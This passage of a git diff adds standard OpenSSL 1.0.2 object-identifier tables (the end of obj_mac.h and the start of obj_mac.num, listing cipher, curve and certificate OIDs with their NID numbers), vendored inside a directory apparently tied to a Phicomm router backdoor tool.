+#define SN_id_GostR3410_94_TestParamSet		"id-GostR3410-94-TestParamSet"
+#define NID_id_GostR3410_94_TestParamSet		831
+#define OBJ_id_GostR3410_94_TestParamSet		OBJ_cryptopro,32L,0L
+
+#define SN_id_GostR3410_94_CryptoPro_A_ParamSet		"id-GostR3410-94-CryptoPro-A-ParamSet"
+#define NID_id_GostR3410_94_CryptoPro_A_ParamSet		832
+#define OBJ_id_GostR3410_94_CryptoPro_A_ParamSet		OBJ_cryptopro,32L,2L
+
+#define SN_id_GostR3410_94_CryptoPro_B_ParamSet		"id-GostR3410-94-CryptoPro-B-ParamSet"
+#define NID_id_GostR3410_94_CryptoPro_B_ParamSet		833
+#define OBJ_id_GostR3410_94_CryptoPro_B_ParamSet		OBJ_cryptopro,32L,3L
+
+#define SN_id_GostR3410_94_CryptoPro_C_ParamSet		"id-GostR3410-94-CryptoPro-C-ParamSet"
+#define NID_id_GostR3410_94_CryptoPro_C_ParamSet		834
+#define OBJ_id_GostR3410_94_CryptoPro_C_ParamSet		OBJ_cryptopro,32L,4L
+
+#define SN_id_GostR3410_94_CryptoPro_D_ParamSet		"id-GostR3410-94-CryptoPro-D-ParamSet"
+#define NID_id_GostR3410_94_CryptoPro_D_ParamSet		835
+#define OBJ_id_GostR3410_94_CryptoPro_D_ParamSet		OBJ_cryptopro,32L,5L
+
+#define SN_id_GostR3410_94_CryptoPro_XchA_ParamSet		"id-GostR3410-94-CryptoPro-XchA-ParamSet"
+#define NID_id_GostR3410_94_CryptoPro_XchA_ParamSet		836
+#define OBJ_id_GostR3410_94_CryptoPro_XchA_ParamSet		OBJ_cryptopro,33L,1L
+
+#define SN_id_GostR3410_94_CryptoPro_XchB_ParamSet		"id-GostR3410-94-CryptoPro-XchB-ParamSet"
+#define NID_id_GostR3410_94_CryptoPro_XchB_ParamSet		837
+#define OBJ_id_GostR3410_94_CryptoPro_XchB_ParamSet		OBJ_cryptopro,33L,2L
+
+#define SN_id_GostR3410_94_CryptoPro_XchC_ParamSet		"id-GostR3410-94-CryptoPro-XchC-ParamSet"
+#define NID_id_GostR3410_94_CryptoPro_XchC_ParamSet		838
+#define OBJ_id_GostR3410_94_CryptoPro_XchC_ParamSet		OBJ_cryptopro,33L,3L
+
+#define SN_id_GostR3410_2001_TestParamSet		"id-GostR3410-2001-TestParamSet"
+#define NID_id_GostR3410_2001_TestParamSet		839
+#define OBJ_id_GostR3410_2001_TestParamSet		OBJ_cryptopro,35L,0L
+
+#define SN_id_GostR3410_2001_CryptoPro_A_ParamSet		"id-GostR3410-2001-CryptoPro-A-ParamSet"
+#define NID_id_GostR3410_2001_CryptoPro_A_ParamSet		840
+#define OBJ_id_GostR3410_2001_CryptoPro_A_ParamSet		OBJ_cryptopro,35L,1L
+
+#define SN_id_GostR3410_2001_CryptoPro_B_ParamSet		"id-GostR3410-2001-CryptoPro-B-ParamSet"
+#define NID_id_GostR3410_2001_CryptoPro_B_ParamSet		841
+#define OBJ_id_GostR3410_2001_CryptoPro_B_ParamSet		OBJ_cryptopro,35L,2L
+
+#define SN_id_GostR3410_2001_CryptoPro_C_ParamSet		"id-GostR3410-2001-CryptoPro-C-ParamSet"
+#define NID_id_GostR3410_2001_CryptoPro_C_ParamSet		842
+#define OBJ_id_GostR3410_2001_CryptoPro_C_ParamSet		OBJ_cryptopro,35L,3L
+
+#define SN_id_GostR3410_2001_CryptoPro_XchA_ParamSet		"id-GostR3410-2001-CryptoPro-XchA-ParamSet"
+#define NID_id_GostR3410_2001_CryptoPro_XchA_ParamSet		843
+#define OBJ_id_GostR3410_2001_CryptoPro_XchA_ParamSet		OBJ_cryptopro,36L,0L
+
+#define SN_id_GostR3410_2001_CryptoPro_XchB_ParamSet		"id-GostR3410-2001-CryptoPro-XchB-ParamSet"
+#define NID_id_GostR3410_2001_CryptoPro_XchB_ParamSet		844
+#define OBJ_id_GostR3410_2001_CryptoPro_XchB_ParamSet		OBJ_cryptopro,36L,1L
+
+#define SN_id_GostR3410_94_a		"id-GostR3410-94-a"
+#define NID_id_GostR3410_94_a		845
+#define OBJ_id_GostR3410_94_a		OBJ_id_GostR3410_94,1L
+
+#define SN_id_GostR3410_94_aBis		"id-GostR3410-94-aBis"
+#define NID_id_GostR3410_94_aBis		846
+#define OBJ_id_GostR3410_94_aBis		OBJ_id_GostR3410_94,2L
+
+#define SN_id_GostR3410_94_b		"id-GostR3410-94-b"
+#define NID_id_GostR3410_94_b		847
+#define OBJ_id_GostR3410_94_b		OBJ_id_GostR3410_94,3L
+
+#define SN_id_GostR3410_94_bBis		"id-GostR3410-94-bBis"
+#define NID_id_GostR3410_94_bBis		848
+#define OBJ_id_GostR3410_94_bBis		OBJ_id_GostR3410_94,4L
+
+#define SN_id_Gost28147_89_cc		"id-Gost28147-89-cc"
+#define LN_id_Gost28147_89_cc		"GOST 28147-89 Cryptocom ParamSet"
+#define NID_id_Gost28147_89_cc		849
+#define OBJ_id_Gost28147_89_cc		OBJ_cryptocom,1L,6L,1L
+
+#define SN_id_GostR3410_94_cc		"gost94cc"
+#define LN_id_GostR3410_94_cc		"GOST 34.10-94 Cryptocom"
+#define NID_id_GostR3410_94_cc		850
+#define OBJ_id_GostR3410_94_cc		OBJ_cryptocom,1L,5L,3L
+
+#define SN_id_GostR3410_2001_cc		"gost2001cc"
+#define LN_id_GostR3410_2001_cc		"GOST 34.10-2001 Cryptocom"
+#define NID_id_GostR3410_2001_cc		851
+#define OBJ_id_GostR3410_2001_cc		OBJ_cryptocom,1L,5L,4L
+
+#define SN_id_GostR3411_94_with_GostR3410_94_cc		"id-GostR3411-94-with-GostR3410-94-cc"
+#define LN_id_GostR3411_94_with_GostR3410_94_cc		"GOST R 34.11-94 with GOST R 34.10-94 Cryptocom"
+#define NID_id_GostR3411_94_with_GostR3410_94_cc		852
+#define OBJ_id_GostR3411_94_with_GostR3410_94_cc		OBJ_cryptocom,1L,3L,3L
+
+#define SN_id_GostR3411_94_with_GostR3410_2001_cc		"id-GostR3411-94-with-GostR3410-2001-cc"
+#define LN_id_GostR3411_94_with_GostR3410_2001_cc		"GOST R 34.11-94 with GOST R 34.10-2001 Cryptocom"
+#define NID_id_GostR3411_94_with_GostR3410_2001_cc		853
+#define OBJ_id_GostR3411_94_with_GostR3410_2001_cc		OBJ_cryptocom,1L,3L,4L
+
+#define SN_id_GostR3410_2001_ParamSet_cc		"id-GostR3410-2001-ParamSet-cc"
+#define LN_id_GostR3410_2001_ParamSet_cc		"GOST R 3410-2001 Parameter Set Cryptocom"
+#define NID_id_GostR3410_2001_ParamSet_cc		854
+#define OBJ_id_GostR3410_2001_ParamSet_cc		OBJ_cryptocom,1L,8L,1L
+
+#define SN_camellia_128_cbc		"CAMELLIA-128-CBC"
+#define LN_camellia_128_cbc		"camellia-128-cbc"
+#define NID_camellia_128_cbc		751
+#define OBJ_camellia_128_cbc		1L,2L,392L,200011L,61L,1L,1L,1L,2L
+
+#define SN_camellia_192_cbc		"CAMELLIA-192-CBC"
+#define LN_camellia_192_cbc		"camellia-192-cbc"
+#define NID_camellia_192_cbc		752
+#define OBJ_camellia_192_cbc		1L,2L,392L,200011L,61L,1L,1L,1L,3L
+
+#define SN_camellia_256_cbc		"CAMELLIA-256-CBC"
+#define LN_camellia_256_cbc		"camellia-256-cbc"
+#define NID_camellia_256_cbc		753
+#define OBJ_camellia_256_cbc		1L,2L,392L,200011L,61L,1L,1L,1L,4L
+
+#define SN_id_camellia128_wrap		"id-camellia128-wrap"
+#define NID_id_camellia128_wrap		907
+#define OBJ_id_camellia128_wrap		1L,2L,392L,200011L,61L,1L,1L,3L,2L
+
+#define SN_id_camellia192_wrap		"id-camellia192-wrap"
+#define NID_id_camellia192_wrap		908
+#define OBJ_id_camellia192_wrap		1L,2L,392L,200011L,61L,1L,1L,3L,3L
+
+#define SN_id_camellia256_wrap		"id-camellia256-wrap"
+#define NID_id_camellia256_wrap		909
+#define OBJ_id_camellia256_wrap		1L,2L,392L,200011L,61L,1L,1L,3L,4L
+
+#define OBJ_ntt_ds		0L,3L,4401L,5L
+
+#define OBJ_camellia		OBJ_ntt_ds,3L,1L,9L
+
+#define SN_camellia_128_ecb		"CAMELLIA-128-ECB"
+#define LN_camellia_128_ecb		"camellia-128-ecb"
+#define NID_camellia_128_ecb		754
+#define OBJ_camellia_128_ecb		OBJ_camellia,1L
+
+#define SN_camellia_128_ofb128		"CAMELLIA-128-OFB"
+#define LN_camellia_128_ofb128		"camellia-128-ofb"
+#define NID_camellia_128_ofb128		766
+#define OBJ_camellia_128_ofb128		OBJ_camellia,3L
+
+#define SN_camellia_128_cfb128		"CAMELLIA-128-CFB"
+#define LN_camellia_128_cfb128		"camellia-128-cfb"
+#define NID_camellia_128_cfb128		757
+#define OBJ_camellia_128_cfb128		OBJ_camellia,4L
+
+#define SN_camellia_192_ecb		"CAMELLIA-192-ECB"
+#define LN_camellia_192_ecb		"camellia-192-ecb"
+#define NID_camellia_192_ecb		755
+#define OBJ_camellia_192_ecb		OBJ_camellia,21L
+
+#define SN_camellia_192_ofb128		"CAMELLIA-192-OFB"
+#define LN_camellia_192_ofb128		"camellia-192-ofb"
+#define NID_camellia_192_ofb128		767
+#define OBJ_camellia_192_ofb128		OBJ_camellia,23L
+
+#define SN_camellia_192_cfb128		"CAMELLIA-192-CFB"
+#define LN_camellia_192_cfb128		"camellia-192-cfb"
+#define NID_camellia_192_cfb128		758
+#define OBJ_camellia_192_cfb128		OBJ_camellia,24L
+
+#define SN_camellia_256_ecb		"CAMELLIA-256-ECB"
+#define LN_camellia_256_ecb		"camellia-256-ecb"
+#define NID_camellia_256_ecb		756
+#define OBJ_camellia_256_ecb		OBJ_camellia,41L
+
+#define SN_camellia_256_ofb128		"CAMELLIA-256-OFB"
+#define LN_camellia_256_ofb128		"camellia-256-ofb"
+#define NID_camellia_256_ofb128		768
+#define OBJ_camellia_256_ofb128		OBJ_camellia,43L
+
+#define SN_camellia_256_cfb128		"CAMELLIA-256-CFB"
+#define LN_camellia_256_cfb128		"camellia-256-cfb"
+#define NID_camellia_256_cfb128		759
+#define OBJ_camellia_256_cfb128		OBJ_camellia,44L
+
+#define SN_camellia_128_cfb1		"CAMELLIA-128-CFB1"
+#define LN_camellia_128_cfb1		"camellia-128-cfb1"
+#define NID_camellia_128_cfb1		760
+
+#define SN_camellia_192_cfb1		"CAMELLIA-192-CFB1"
+#define LN_camellia_192_cfb1		"camellia-192-cfb1"
+#define NID_camellia_192_cfb1		761
+
+#define SN_camellia_256_cfb1		"CAMELLIA-256-CFB1"
+#define LN_camellia_256_cfb1		"camellia-256-cfb1"
+#define NID_camellia_256_cfb1		762
+
+#define SN_camellia_128_cfb8		"CAMELLIA-128-CFB8"
+#define LN_camellia_128_cfb8		"camellia-128-cfb8"
+#define NID_camellia_128_cfb8		763
+
+#define SN_camellia_192_cfb8		"CAMELLIA-192-CFB8"
+#define LN_camellia_192_cfb8		"camellia-192-cfb8"
+#define NID_camellia_192_cfb8		764
+
+#define SN_camellia_256_cfb8		"CAMELLIA-256-CFB8"
+#define LN_camellia_256_cfb8		"camellia-256-cfb8"
+#define NID_camellia_256_cfb8		765
+
+#define SN_kisa		"KISA"
+#define LN_kisa		"kisa"
+#define NID_kisa		773
+#define OBJ_kisa		OBJ_member_body,410L,200004L
+
+#define SN_seed_ecb		"SEED-ECB"
+#define LN_seed_ecb		"seed-ecb"
+#define NID_seed_ecb		776
+#define OBJ_seed_ecb		OBJ_kisa,1L,3L
+
+#define SN_seed_cbc		"SEED-CBC"
+#define LN_seed_cbc		"seed-cbc"
+#define NID_seed_cbc		777
+#define OBJ_seed_cbc		OBJ_kisa,1L,4L
+
+#define SN_seed_cfb128		"SEED-CFB"
+#define LN_seed_cfb128		"seed-cfb"
+#define NID_seed_cfb128		779
+#define OBJ_seed_cfb128		OBJ_kisa,1L,5L
+
+#define SN_seed_ofb128		"SEED-OFB"
+#define LN_seed_ofb128		"seed-ofb"
+#define NID_seed_ofb128		778
+#define OBJ_seed_ofb128		OBJ_kisa,1L,6L
+
+#define SN_hmac		"HMAC"
+#define LN_hmac		"hmac"
+#define NID_hmac		855
+
+#define SN_cmac		"CMAC"
+#define LN_cmac		"cmac"
+#define NID_cmac		894
+
+#define SN_rc4_hmac_md5		"RC4-HMAC-MD5"
+#define LN_rc4_hmac_md5		"rc4-hmac-md5"
+#define NID_rc4_hmac_md5		915
+
+#define SN_aes_128_cbc_hmac_sha1		"AES-128-CBC-HMAC-SHA1"
+#define LN_aes_128_cbc_hmac_sha1		"aes-128-cbc-hmac-sha1"
+#define NID_aes_128_cbc_hmac_sha1		916
+
+#define SN_aes_192_cbc_hmac_sha1		"AES-192-CBC-HMAC-SHA1"
+#define LN_aes_192_cbc_hmac_sha1		"aes-192-cbc-hmac-sha1"
+#define NID_aes_192_cbc_hmac_sha1		917
+
+#define SN_aes_256_cbc_hmac_sha1		"AES-256-CBC-HMAC-SHA1"
+#define LN_aes_256_cbc_hmac_sha1		"aes-256-cbc-hmac-sha1"
+#define NID_aes_256_cbc_hmac_sha1		918
+
+#define SN_aes_128_cbc_hmac_sha256		"AES-128-CBC-HMAC-SHA256"
+#define LN_aes_128_cbc_hmac_sha256		"aes-128-cbc-hmac-sha256"
+#define NID_aes_128_cbc_hmac_sha256		948
+
+#define SN_aes_192_cbc_hmac_sha256		"AES-192-CBC-HMAC-SHA256"
+#define LN_aes_192_cbc_hmac_sha256		"aes-192-cbc-hmac-sha256"
+#define NID_aes_192_cbc_hmac_sha256		949
+
+#define SN_aes_256_cbc_hmac_sha256		"AES-256-CBC-HMAC-SHA256"
+#define LN_aes_256_cbc_hmac_sha256		"aes-256-cbc-hmac-sha256"
+#define NID_aes_256_cbc_hmac_sha256		950
+
+#define SN_dhpublicnumber		"dhpublicnumber"
+#define LN_dhpublicnumber		"X9.42 DH"
+#define NID_dhpublicnumber		920
+#define OBJ_dhpublicnumber		OBJ_ISO_US,10046L,2L,1L
+
+#define SN_brainpoolP160r1		"brainpoolP160r1"
+#define NID_brainpoolP160r1		921
+#define OBJ_brainpoolP160r1		1L,3L,36L,3L,3L,2L,8L,1L,1L,1L
+
+#define SN_brainpoolP160t1		"brainpoolP160t1"
+#define NID_brainpoolP160t1		922
+#define OBJ_brainpoolP160t1		1L,3L,36L,3L,3L,2L,8L,1L,1L,2L
+
+#define SN_brainpoolP192r1		"brainpoolP192r1"
+#define NID_brainpoolP192r1		923
+#define OBJ_brainpoolP192r1		1L,3L,36L,3L,3L,2L,8L,1L,1L,3L
+
+#define SN_brainpoolP192t1		"brainpoolP192t1"
+#define NID_brainpoolP192t1		924
+#define OBJ_brainpoolP192t1		1L,3L,36L,3L,3L,2L,8L,1L,1L,4L
+
+#define SN_brainpoolP224r1		"brainpoolP224r1"
+#define NID_brainpoolP224r1		925
+#define OBJ_brainpoolP224r1		1L,3L,36L,3L,3L,2L,8L,1L,1L,5L
+
+#define SN_brainpoolP224t1		"brainpoolP224t1"
+#define NID_brainpoolP224t1		926
+#define OBJ_brainpoolP224t1		1L,3L,36L,3L,3L,2L,8L,1L,1L,6L
+
+#define SN_brainpoolP256r1		"brainpoolP256r1"
+#define NID_brainpoolP256r1		927
+#define OBJ_brainpoolP256r1		1L,3L,36L,3L,3L,2L,8L,1L,1L,7L
+
+#define SN_brainpoolP256t1		"brainpoolP256t1"
+#define NID_brainpoolP256t1		928
+#define OBJ_brainpoolP256t1		1L,3L,36L,3L,3L,2L,8L,1L,1L,8L
+
+#define SN_brainpoolP320r1		"brainpoolP320r1"
+#define NID_brainpoolP320r1		929
+#define OBJ_brainpoolP320r1		1L,3L,36L,3L,3L,2L,8L,1L,1L,9L
+
+#define SN_brainpoolP320t1		"brainpoolP320t1"
+#define NID_brainpoolP320t1		930
+#define OBJ_brainpoolP320t1		1L,3L,36L,3L,3L,2L,8L,1L,1L,10L
+
+#define SN_brainpoolP384r1		"brainpoolP384r1"
+#define NID_brainpoolP384r1		931
+#define OBJ_brainpoolP384r1		1L,3L,36L,3L,3L,2L,8L,1L,1L,11L
+
+#define SN_brainpoolP384t1		"brainpoolP384t1"
+#define NID_brainpoolP384t1		932
+#define OBJ_brainpoolP384t1		1L,3L,36L,3L,3L,2L,8L,1L,1L,12L
+
+#define SN_brainpoolP512r1		"brainpoolP512r1"
+#define NID_brainpoolP512r1		933
+#define OBJ_brainpoolP512r1		1L,3L,36L,3L,3L,2L,8L,1L,1L,13L
+
+#define SN_brainpoolP512t1		"brainpoolP512t1"
+#define NID_brainpoolP512t1		934
+#define OBJ_brainpoolP512t1		1L,3L,36L,3L,3L,2L,8L,1L,1L,14L
+
+#define OBJ_x9_63_scheme		1L,3L,133L,16L,840L,63L,0L
+
+#define OBJ_secg_scheme		OBJ_certicom_arc,1L
+
+#define SN_dhSinglePass_stdDH_sha1kdf_scheme		"dhSinglePass-stdDH-sha1kdf-scheme"
+#define NID_dhSinglePass_stdDH_sha1kdf_scheme		936
+#define OBJ_dhSinglePass_stdDH_sha1kdf_scheme		OBJ_x9_63_scheme,2L
+
+#define SN_dhSinglePass_stdDH_sha224kdf_scheme		"dhSinglePass-stdDH-sha224kdf-scheme"
+#define NID_dhSinglePass_stdDH_sha224kdf_scheme		937
+#define OBJ_dhSinglePass_stdDH_sha224kdf_scheme		OBJ_secg_scheme,11L,0L
+
+#define SN_dhSinglePass_stdDH_sha256kdf_scheme		"dhSinglePass-stdDH-sha256kdf-scheme"
+#define NID_dhSinglePass_stdDH_sha256kdf_scheme		938
+#define OBJ_dhSinglePass_stdDH_sha256kdf_scheme		OBJ_secg_scheme,11L,1L
+
+#define SN_dhSinglePass_stdDH_sha384kdf_scheme		"dhSinglePass-stdDH-sha384kdf-scheme"
+#define NID_dhSinglePass_stdDH_sha384kdf_scheme		939
+#define OBJ_dhSinglePass_stdDH_sha384kdf_scheme		OBJ_secg_scheme,11L,2L
+
+#define SN_dhSinglePass_stdDH_sha512kdf_scheme		"dhSinglePass-stdDH-sha512kdf-scheme"
+#define NID_dhSinglePass_stdDH_sha512kdf_scheme		940
+#define OBJ_dhSinglePass_stdDH_sha512kdf_scheme		OBJ_secg_scheme,11L,3L
+
+#define SN_dhSinglePass_cofactorDH_sha1kdf_scheme		"dhSinglePass-cofactorDH-sha1kdf-scheme"
+#define NID_dhSinglePass_cofactorDH_sha1kdf_scheme		941
+#define OBJ_dhSinglePass_cofactorDH_sha1kdf_scheme		OBJ_x9_63_scheme,3L
+
+#define SN_dhSinglePass_cofactorDH_sha224kdf_scheme		"dhSinglePass-cofactorDH-sha224kdf-scheme"
+#define NID_dhSinglePass_cofactorDH_sha224kdf_scheme		942
+#define OBJ_dhSinglePass_cofactorDH_sha224kdf_scheme		OBJ_secg_scheme,14L,0L
+
+#define SN_dhSinglePass_cofactorDH_sha256kdf_scheme		"dhSinglePass-cofactorDH-sha256kdf-scheme"
+#define NID_dhSinglePass_cofactorDH_sha256kdf_scheme		943
+#define OBJ_dhSinglePass_cofactorDH_sha256kdf_scheme		OBJ_secg_scheme,14L,1L
+
+#define SN_dhSinglePass_cofactorDH_sha384kdf_scheme		"dhSinglePass-cofactorDH-sha384kdf-scheme"
+#define NID_dhSinglePass_cofactorDH_sha384kdf_scheme		944
+#define OBJ_dhSinglePass_cofactorDH_sha384kdf_scheme		OBJ_secg_scheme,14L,2L
+
+#define SN_dhSinglePass_cofactorDH_sha512kdf_scheme		"dhSinglePass-cofactorDH-sha512kdf-scheme"
+#define NID_dhSinglePass_cofactorDH_sha512kdf_scheme		945
+#define OBJ_dhSinglePass_cofactorDH_sha512kdf_scheme		OBJ_secg_scheme,14L,3L
+
+#define SN_dh_std_kdf		"dh-std-kdf"
+#define NID_dh_std_kdf		946
+
+#define SN_dh_cofactor_kdf		"dh-cofactor-kdf"
+#define NID_dh_cofactor_kdf		947
+
+#define SN_ct_precert_scts		"ct_precert_scts"
+#define LN_ct_precert_scts		"CT Precertificate SCTs"
+#define NID_ct_precert_scts		951
+#define OBJ_ct_precert_scts		1L,3L,6L,1L,4L,1L,11129L,2L,4L,2L
+
+#define SN_ct_precert_poison		"ct_precert_poison"
+#define LN_ct_precert_poison		"CT Precertificate Poison"
+#define NID_ct_precert_poison		952
+#define OBJ_ct_precert_poison		1L,3L,6L,1L,4L,1L,11129L,2L,4L,3L
+
+#define SN_ct_precert_signer		"ct_precert_signer"
+#define LN_ct_precert_signer		"CT Precertificate Signer"
+#define NID_ct_precert_signer		953
+#define OBJ_ct_precert_signer		1L,3L,6L,1L,4L,1L,11129L,2L,4L,4L
+
+#define SN_ct_cert_scts		"ct_cert_scts"
+#define LN_ct_cert_scts		"CT Certificate SCTs"
+#define NID_ct_cert_scts		954
+#define OBJ_ct_cert_scts		1L,3L,6L,1L,4L,1L,11129L,2L,4L,5L
+
+#define SN_jurisdictionLocalityName		"jurisdictionL"
+#define LN_jurisdictionLocalityName		"jurisdictionLocalityName"
+#define NID_jurisdictionLocalityName		955
+#define OBJ_jurisdictionLocalityName		1L,3L,6L,1L,4L,1L,311L,60L,2L,1L,1L
+
+#define SN_jurisdictionStateOrProvinceName		"jurisdictionST"
+#define LN_jurisdictionStateOrProvinceName		"jurisdictionStateOrProvinceName"
+#define NID_jurisdictionStateOrProvinceName		956
+#define OBJ_jurisdictionStateOrProvinceName		1L,3L,6L,1L,4L,1L,311L,60L,2L,1L,2L
+
+#define SN_jurisdictionCountryName		"jurisdictionC"
+#define LN_jurisdictionCountryName		"jurisdictionCountryName"
+#define NID_jurisdictionCountryName		957
+#define OBJ_jurisdictionCountryName		1L,3L,6L,1L,4L,1L,311L,60L,2L,1L,3L
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_mac.num b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_mac.num
new file mode 100644
index 0000000..8e5ea83
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_mac.num
@@ -0,0 +1,957 @@
+undef		0
+rsadsi		1
+pkcs		2
+md2		3
+md5		4
+rc4		5
+rsaEncryption		6
+md2WithRSAEncryption		7
+md5WithRSAEncryption		8
+pbeWithMD2AndDES_CBC		9
+pbeWithMD5AndDES_CBC		10
+X500		11
+X509		12
+commonName		13
+countryName		14
+localityName		15
+stateOrProvinceName		16
+organizationName		17
+organizationalUnitName		18
+rsa		19
+pkcs7		20
+pkcs7_data		21
+pkcs7_signed		22
+pkcs7_enveloped		23
+pkcs7_signedAndEnveloped		24
+pkcs7_digest		25
+pkcs7_encrypted		26
+pkcs3		27
+dhKeyAgreement		28
+des_ecb		29
+des_cfb64		30
+des_cbc		31
+des_ede_ecb		32
+des_ede3_ecb		33
+idea_cbc		34
+idea_cfb64		35
+idea_ecb		36
+rc2_cbc		37
+rc2_ecb		38
+rc2_cfb64		39
+rc2_ofb64		40
+sha		41
+shaWithRSAEncryption		42
+des_ede_cbc		43
+des_ede3_cbc		44
+des_ofb64		45
+idea_ofb64		46
+pkcs9		47
+pkcs9_emailAddress		48
+pkcs9_unstructuredName		49
+pkcs9_contentType		50
+pkcs9_messageDigest		51
+pkcs9_signingTime		52
+pkcs9_countersignature		53
+pkcs9_challengePassword		54
+pkcs9_unstructuredAddress		55
+pkcs9_extCertAttributes		56
+netscape		57
+netscape_cert_extension		58
+netscape_data_type		59
+des_ede_cfb64		60
+des_ede3_cfb64		61
+des_ede_ofb64		62
+des_ede3_ofb64		63
+sha1		64
+sha1WithRSAEncryption		65
+dsaWithSHA		66
+dsa_2		67
+pbeWithSHA1AndRC2_CBC		68
+id_pbkdf2		69
+dsaWithSHA1_2		70
+netscape_cert_type		71
+netscape_base_url		72
+netscape_revocation_url		73
+netscape_ca_revocation_url		74
+netscape_renewal_url		75
+netscape_ca_policy_url		76
+netscape_ssl_server_name		77
+netscape_comment		78
+netscape_cert_sequence		79
+desx_cbc		80
+id_ce		81
+subject_key_identifier		82
+key_usage		83
+private_key_usage_period		84
+subject_alt_name		85
+issuer_alt_name		86
+basic_constraints		87
+crl_number		88
+certificate_policies		89
+authority_key_identifier		90
+bf_cbc		91
+bf_ecb		92
+bf_cfb64		93
+bf_ofb64		94
+mdc2		95
+mdc2WithRSA		96
+rc4_40		97
+rc2_40_cbc		98
+givenName		99
+surname		100
+initials		101
+uniqueIdentifier		102
+crl_distribution_points		103
+md5WithRSA		104
+serialNumber		105
+title		106
+description		107
+cast5_cbc		108
+cast5_ecb		109
+cast5_cfb64		110
+cast5_ofb64		111
+pbeWithMD5AndCast5_CBC		112
+dsaWithSHA1		113
+md5_sha1		114
+sha1WithRSA		115
+dsa		116
+ripemd160		117
+ripemd160WithRSA		119
+rc5_cbc		120
+rc5_ecb		121
+rc5_cfb64		122
+rc5_ofb64		123
+rle_compression		124
+zlib_compression		125
+ext_key_usage		126
+id_pkix		127
+id_kp		128
+server_auth		129
+client_auth		130
+code_sign		131
+email_protect		132
+time_stamp		133
+ms_code_ind		134
+ms_code_com		135
+ms_ctl_sign		136
+ms_sgc		137
+ms_efs		138
+ns_sgc		139
+delta_crl		140
+crl_reason		141
+invalidity_date		142
+sxnet		143
+pbe_WithSHA1And128BitRC4		144
+pbe_WithSHA1And40BitRC4		145
+pbe_WithSHA1And3_Key_TripleDES_CBC		146
+pbe_WithSHA1And2_Key_TripleDES_CBC		147
+pbe_WithSHA1And128BitRC2_CBC		148
+pbe_WithSHA1And40BitRC2_CBC		149
+keyBag		150
+pkcs8ShroudedKeyBag		151
+certBag		152
+crlBag		153
+secretBag		154
+safeContentsBag		155
+friendlyName		156
+localKeyID		157
+x509Certificate		158
+sdsiCertificate		159
+x509Crl		160
+pbes2		161
+pbmac1		162
+hmacWithSHA1		163
+id_qt_cps		164
+id_qt_unotice		165
+rc2_64_cbc		166
+SMIMECapabilities		167
+pbeWithMD2AndRC2_CBC		168
+pbeWithMD5AndRC2_CBC		169
+pbeWithSHA1AndDES_CBC		170
+ms_ext_req		171
+ext_req		172
+name		173
+dnQualifier		174
+id_pe		175
+id_ad		176
+info_access		177
+ad_OCSP		178
+ad_ca_issuers		179
+OCSP_sign		180
+iso		181
+member_body		182
+ISO_US		183
+X9_57		184
+X9cm		185
+pkcs1		186
+pkcs5		187
+SMIME		188
+id_smime_mod		189
+id_smime_ct		190
+id_smime_aa		191
+id_smime_alg		192
+id_smime_cd		193
+id_smime_spq		194
+id_smime_cti		195
+id_smime_mod_cms		196
+id_smime_mod_ess		197
+id_smime_mod_oid		198
+id_smime_mod_msg_v3		199
+id_smime_mod_ets_eSignature_88		200
+id_smime_mod_ets_eSignature_97		201
+id_smime_mod_ets_eSigPolicy_88		202
+id_smime_mod_ets_eSigPolicy_97		203
+id_smime_ct_receipt		204
+id_smime_ct_authData		205
+id_smime_ct_publishCert		206
+id_smime_ct_TSTInfo		207
+id_smime_ct_TDTInfo		208
+id_smime_ct_contentInfo		209
+id_smime_ct_DVCSRequestData		210
+id_smime_ct_DVCSResponseData		211
+id_smime_aa_receiptRequest		212
+id_smime_aa_securityLabel		213
+id_smime_aa_mlExpandHistory		214
+id_smime_aa_contentHint		215
+id_smime_aa_msgSigDigest		216
+id_smime_aa_encapContentType		217
+id_smime_aa_contentIdentifier		218
+id_smime_aa_macValue		219
+id_smime_aa_equivalentLabels		220
+id_smime_aa_contentReference		221
+id_smime_aa_encrypKeyPref		222
+id_smime_aa_signingCertificate		223
+id_smime_aa_smimeEncryptCerts		224
+id_smime_aa_timeStampToken		225
+id_smime_aa_ets_sigPolicyId		226
+id_smime_aa_ets_commitmentType		227
+id_smime_aa_ets_signerLocation		228
+id_smime_aa_ets_signerAttr		229
+id_smime_aa_ets_otherSigCert		230
+id_smime_aa_ets_contentTimestamp		231
+id_smime_aa_ets_CertificateRefs		232
+id_smime_aa_ets_RevocationRefs		233
+id_smime_aa_ets_certValues		234
+id_smime_aa_ets_revocationValues		235
+id_smime_aa_ets_escTimeStamp		236
+id_smime_aa_ets_certCRLTimestamp		237
+id_smime_aa_ets_archiveTimeStamp		238
+id_smime_aa_signatureType		239
+id_smime_aa_dvcs_dvc		240
+id_smime_alg_ESDHwith3DES		241
+id_smime_alg_ESDHwithRC2		242
+id_smime_alg_3DESwrap		243
+id_smime_alg_RC2wrap		244
+id_smime_alg_ESDH		245
+id_smime_alg_CMS3DESwrap		246
+id_smime_alg_CMSRC2wrap		247
+id_smime_cd_ldap		248
+id_smime_spq_ets_sqt_uri		249
+id_smime_spq_ets_sqt_unotice		250
+id_smime_cti_ets_proofOfOrigin		251
+id_smime_cti_ets_proofOfReceipt		252
+id_smime_cti_ets_proofOfDelivery		253
+id_smime_cti_ets_proofOfSender		254
+id_smime_cti_ets_proofOfApproval		255
+id_smime_cti_ets_proofOfCreation		256
+md4		257
+id_pkix_mod		258
+id_qt		259
+id_it		260
+id_pkip		261
+id_alg		262
+id_cmc		263
+id_on		264
+id_pda		265
+id_aca		266
+id_qcs		267
+id_cct		268
+id_pkix1_explicit_88		269
+id_pkix1_implicit_88		270
+id_pkix1_explicit_93		271
+id_pkix1_implicit_93		272
+id_mod_crmf		273
+id_mod_cmc		274
+id_mod_kea_profile_88		275
+id_mod_kea_profile_93		276
+id_mod_cmp		277
+id_mod_qualified_cert_88		278
+id_mod_qualified_cert_93		279
+id_mod_attribute_cert		280
+id_mod_timestamp_protocol		281
+id_mod_ocsp		282
+id_mod_dvcs		283
+id_mod_cmp2000		284
+biometricInfo		285
+qcStatements		286
+ac_auditEntity		287
+ac_targeting		288
+aaControls		289
+sbgp_ipAddrBlock		290
+sbgp_autonomousSysNum		291
+sbgp_routerIdentifier		292
+textNotice		293
+ipsecEndSystem		294
+ipsecTunnel		295
+ipsecUser		296
+dvcs		297
